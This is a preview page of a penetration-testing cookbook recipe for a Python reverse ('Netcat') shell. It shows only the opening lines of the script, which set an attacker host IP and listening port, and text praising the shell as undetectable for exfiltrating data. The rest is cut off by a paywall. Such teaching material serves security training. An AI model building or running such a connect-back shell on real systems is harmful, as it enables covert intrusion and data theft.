Creating a simple Netcat shell

The following script we're going to create leverages the use of raw sockets to exfiltrate data from a network. The general idea of this shell is to create a connection between the compromised machine and your own machine through a Netcat (or other program) session and send commands to the machine this way.

The beauty of this Python script is the undetectable nature of it, as it appears as a completely legitimate script.

How to do it…

This is the script that will establish a connection through Netcat and read the input:

import socket import subprocess import sys import time HOST = '172.16.0.2' # Your attacking machine to connect back to PORT = 4444 # The port your attacking machine is listening on def connect((host, port)): ...

Get Python Web Penetration Testing Cookbook now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Python Web Penetration Testing Cookbook by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, Dave Mound

Creating a simple Netcat shell

How to do it…

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly